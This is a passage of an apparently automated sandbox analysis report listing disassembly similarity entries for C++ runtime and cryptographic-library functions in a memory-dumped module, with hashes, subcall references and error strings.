                                            • API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
                                            • String ID:
                                            • API String ID: 3043633502-0
                                            • Opcode ID: 0db025daf4c3a9034fe17d28f53d3ab5d77ec70ed23aefb2be25b12918af1043
                                            • Instruction ID: 7b2cff0797e97aef96c409c45023a3bba94673b0f12099fdaf72beca47a8233c
                                            • Opcode Fuzzy Hash: 0db025daf4c3a9034fe17d28f53d3ab5d77ec70ed23aefb2be25b12918af1043
                                            • Instruction Fuzzy Hash: 97F02B765043116BD620EB595C51BBF76FCAFA1614FC0082CF97461600F722D108C5F7
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                            • Instruction ID: d9cf03700726d7f32c24440ae99603e8f2d67620950f276b1a1e4191884bbd65
                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                            • Instruction Fuzzy Hash: D8118C3700014EBBCF125E84DE15CEE3F26BB19358F998914FE2859030C336C6B2AB81
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memmove_memset
                                            • String ID: EncodingParameters
                                            • API String ID: 3555123492-55378216
                                            • Opcode ID: a9b8986899536f080f33b77bb5aa4bcf13afa94fa7454ce09e5e45afa6cc10be
                                            • Instruction ID: 5a1579e416ce4ebe480498162307e1e23db4c394ae1366f6352f07009cdea7c9
                                            • Opcode Fuzzy Hash: a9b8986899536f080f33b77bb5aa4bcf13afa94fa7454ce09e5e45afa6cc10be
                                            • Instruction Fuzzy Hash: B16111B4208341AFC304CF68C880A2AFBE9BFC9754F504A1DF59987391D7B0E941CBA2
                                            APIs
                                              • Part of subcall function 68944760: __CxxThrowException@8.LIBCMT ref: 689447F9
                                              • Part of subcall function 68978D80: _malloc.LIBCMT ref: 68978D8A
                                              • Part of subcall function 68978D80: _malloc.LIBCMT ref: 68978DAF
                                            • _memcpy_s.LIBCMT ref: 6894F282
                                            • _memset.LIBCMT ref: 6894F293
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _malloc$Exception@8Throw_memcpy_s_memset
                                            • String ID: @
                                            • API String ID: 3081897325-2766056989
                                            • Opcode ID: c58c8dff6fcfd7eeda413869b2a5d4f2626d981f4059429d2ca1c3d1eca66228
                                            • Instruction ID: d0bfa27e7011caaaddc5fcde0867c857207d3d0fa09d67438d0b36472ddd8fa5
                                            • Opcode Fuzzy Hash: c58c8dff6fcfd7eeda413869b2a5d4f2626d981f4059429d2ca1c3d1eca66228
                                            • Instruction Fuzzy Hash: 1A519D74D00349EFDB20CFA8D841BEEBBB4BF55308F508198D45967281DBB1AA49CF92
                                            APIs
                                              • Part of subcall function 689A95E6: type_info::_Name_base.LIBCMT ref: 689A95EF
                                            • __CxxThrowException@8.LIBCMT ref: 6897A2C7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Name_baseThrowtype_info::_
                                            • String ID: : Missing required parameter '$Aj?Q
                                            • API String ID: 1506718226-2123987499
                                            • Opcode ID: 214f106f3cd478204a3786b6969b986f6eaa4014e87519a3fefafa192e419f86
                                            • Instruction ID: 1c4e6aa233508993afdbdfef62148f2f2a69f51ecd3c507cd6feedaefd1ea6c2
                                            • Opcode Fuzzy Hash: 214f106f3cd478204a3786b6969b986f6eaa4014e87519a3fefafa192e419f86
                                            • Instruction Fuzzy Hash: DC515F7510C3819FD324CF58C854BABBBE5ABD9308F444A1DE19A57291DB75D808CB62
                                            APIs
                                              • Part of subcall function 689A95E6: type_info::_Name_base.LIBCMT ref: 689A95EF
                                            • __CxxThrowException@8.LIBCMT ref: 68999EE7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Name_baseThrowtype_info::_
                                            • String ID: : Missing required parameter '$Aj?Q
                                            • API String ID: 1506718226-2123987499
                                            • Opcode ID: 8b4b23c1a144664848a2906b21eb49e1697e9d5855825bc22687e74718f0befb
                                            • Instruction ID: 8bada39cb07375a90b1dea347a4a39ece16f736b4afd2c322229a6b2d4b5fb53
                                            • Opcode Fuzzy Hash: 8b4b23c1a144664848a2906b21eb49e1697e9d5855825bc22687e74718f0befb
                                            • Instruction Fuzzy Hash: 88515F7510C3819FD724CF68C854BABBBE9BBD9308F444A1DE19A57291DB71D808CB62
                                            APIs
                                              • Part of subcall function 689A95E6: type_info::_Name_base.LIBCMT ref: 689A95EF
                                            • __CxxThrowException@8.LIBCMT ref: 6899A0E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Name_baseThrowtype_info::_
                                            • String ID: : Missing required parameter '$Aj?Q
                                            • API String ID: 1506718226-2123987499
                                            • Opcode ID: adafdc5c98dabe8156df93466ee12a1ee3fdcc69c63fee7ee733ce768f6d8efb
                                            • Instruction ID: f378da3f891d8436e9ec375068f9b56fb74f7520815db22af11fda0f3a29d373
                                            • Opcode Fuzzy Hash: adafdc5c98dabe8156df93466ee12a1ee3fdcc69c63fee7ee733ce768f6d8efb
                                            • Instruction Fuzzy Hash: 8C515F7510C3819FD724CF68C854BABBBE5BBD9308F444A1DE19A57291DB71D808CB62
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68944175
                                            • _memmove.LIBCMT ref: 689441C6
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: string too long
                                            • API String ID: 2168136238-2556327735
                                            • Opcode ID: be93ed1b179d7f253de0bf1e0f9cfac3bea3866abf5124d690de1e26c782afce
                                            • Instruction ID: 35c6e7165b67c68b1a717e212ec91af150d46a902c4b9f9a3e34f5eaffb3b056
                                            • Opcode Fuzzy Hash: be93ed1b179d7f253de0bf1e0f9cfac3bea3866abf5124d690de1e26c782afce
                                            • Instruction Fuzzy Hash: 8931D9367026104BD7308E5CEC80A6AF7EDFBB9764BA0051FE492CB640C761D8428BA1
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 6897C39B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: gfff$gfff
                                            • API String ID: 2005118841-3084402119
                                            • Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                            • Instruction ID: 06658562e22123a7c7db4c244ed36c5b87237d5b0bab53a82bf89beff29cefbe
                                            • Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                            • Instruction Fuzzy Hash: 8D313F75A0020DAFDB14CF98D980EBEB7B9EB94318F44861CE91597284D730BA05CBA1
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 68941F36
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            • std::exception::exception.LIBCMT ref: 68941F6E
                                              • Part of subcall function 689A95C1: std::exception::operator=.LIBCMT ref: 689A95DA
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 68944067
                                              • Part of subcall function 68944010: _memmove.LIBCMT ref: 689440C8
                                            Strings
                                            • CryptoMaterial: this object does not support precomputation, xrefs: 68941ED4
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                            • String ID: CryptoMaterial: this object does not support precomputation
                                            • API String ID: 2192554526-3625584042
                                            • Opcode ID: 645baa6354d2c9cef5e40f89faa31d630c186347d9e144b4e8096472da450cc1
                                            • Instruction ID: 80e86969c7890e3789fb72a4ef2d1b1edcca804fb921b3db493a53d98cb8bc0c
                                            • Opcode Fuzzy Hash: 645baa6354d2c9cef5e40f89faa31d630c186347d9e144b4e8096472da450cc1
                                            • Instruction Fuzzy Hash: 87319EB1904248EFCB10CF98D881AAEFBF8FB19714F50462EE421A7780D7769904CF91
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 68953327
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6895336B
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 1735018483-3788999226
                                            • Opcode ID: 4904963a7adcf0366c17620a5bb718dca50fff200df6856ff55c1b023e7b1519
                                            • Instruction ID: 29f7ca5bb0647e1dfb16f3a67a7ab5a3ae3b060b3038127c9b4888fc001d76fc
                                            • Opcode Fuzzy Hash: 4904963a7adcf0366c17620a5bb718dca50fff200df6856ff55c1b023e7b1519
                                            • Instruction Fuzzy Hash: 6F31D675A042069FCB14CF68D884E6EBBB4FF45718F544629F9259B380D732ED00CB92
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6896584D
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • VariantClear.OLEAUT32(00000000), ref: 68965899
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 2677079660-3788999226
                                            • Opcode ID: 4cac72c8d1bb6de0a511f789d2b9e67f0e0475ec8e28da6d930bbbe0a2e44365
                                            • Instruction ID: 06f6e93dcd40b0570eb47e13ba2b4b7ff1ed2a64005a9c425598de1380ce7421
                                            • Opcode Fuzzy Hash: 4cac72c8d1bb6de0a511f789d2b9e67f0e0475ec8e28da6d930bbbe0a2e44365
                                            • Instruction Fuzzy Hash: FC2183B6A006059FD710CF6CC880A6EB7F9FF85364F90462EE465D7741D735E9408B91
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6895576B
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A9113
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68955782
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                            • String ID: string too long
                                            • API String ID: 963545896-2556327735
                                            • Opcode ID: fbccdc93be7c7dcde9876e2bbe3fecf11f8a186e7ee4b9c8504aedde8fd15b34
                                            • Instruction ID: 88b8692e32cf1137277ef5bf60676916b88de7dae3353be6c79a9426f3f53125
                                            • Opcode Fuzzy Hash: fbccdc93be7c7dcde9876e2bbe3fecf11f8a186e7ee4b9c8504aedde8fd15b34
                                            • Instruction Fuzzy Hash: AE11EC333046109FD721DE5CE880A7AF7EDEFA5A64FA0061FE562C7651C7A1E81483A2
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 6894E4DF
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: GeneratableCryptoMaterial: this object does not support key/parameter generation$PAj?Q
                                            • API String ID: 3718517217-1742105936
                                            • Opcode ID: 31f06dde0281e89ffb2603781d625149a63e4643fc4f356da7375af7aa046234
                                            • Instruction ID: c9dbe7758f33b9f24d408e5e53d1c0f41a5acad24329670131272250a7a442f0
                                            • Opcode Fuzzy Hash: 31f06dde0281e89ffb2603781d625149a63e4643fc4f356da7375af7aa046234
                                            • Instruction Fuzzy Hash: A711BF70C00248AFDB10DFE8D891BEEFBB8BF15304F90421AE42163681DB359604CF51
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 689446C4
                                              • Part of subcall function 689A90D8: std::exception::exception.LIBCMT ref: 689A90ED
                                              • Part of subcall function 689A90D8: __CxxThrowException@8.LIBCMT ref: 689A9102
